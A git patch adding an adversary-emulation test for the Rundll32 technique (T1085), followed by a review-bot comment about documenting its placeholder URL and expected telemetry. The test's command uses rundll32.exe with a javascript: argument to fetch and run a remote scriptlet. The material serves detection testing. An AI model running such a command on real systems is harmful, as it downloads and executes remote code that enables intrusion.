From ba333046de54eccf70a2ba41e7a6f2ee7daf2146 Mon Sep 17 00:00:00 2001
From: Brian Beyer
Date: Sat, 12 May 2018 23:09:43 +0200
Subject: [PATCH] add t1085 from yamlize branch
---
 atomics/t1085/t1085.yaml | 17 +++++++++++++++++
 1 file changed, 17 insertions(+)
 create mode 100644 atomics/t1085/t1085.yaml
diff --git a/atomics/t1085/t1085.yaml b/atomics/t1085/t1085.yaml
new file mode 100644
index 00000000..b1628ac6
--- /dev/null
+++ b/atomics/t1085/t1085.yaml
@@ -0,0 +1,17 @@
+attack_technique: T1085
+display_name: Rundll32
+atomic_tests:
+- name: Rundll32 execute JavaScript Remote Payload With GetObject
+ description: |
+ Test execution of a remote script using rundll32.exe
+ supported_platforms:
+ - windows
+ input_arguments:
+ file_url:
+ description: location of the payload
+ type: Url
+ default: https://www.example.com/1085.sct
+ executor:
+ name: command_prompt
+ command: |
+ rundll32.exe javascript:"\..\mshtml,RunHTMLApplication ";document.write();GetObject("script:#{file_url}")"
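Review bot: The test's `description` and the `file_url` argument give no way to tell a successful run from a silent failure: the default `https://www.example.com/1085.sct` is a placeholder that serves no scriptlet, and nothing states what the fetched file is expected to do or what observable result confirms execution. Suggest extending the `description` block to say that `file_url` must point at a scriptlet hosted under the operator's control for this exercise, that the default is a placeholder to be overridden, and which host telemetry (a `rundll32.exe` process with a `javascript:` argument followed by an outbound request to `file_url`) a detection engineer should expect to see when the test runs. The `file_url` argument's own `description: location of the payload` could carry the same caveat in one line, e.g. `description: URL of an operator-hosted .sct scriptlet (default is a placeholder and will not execute anything)`.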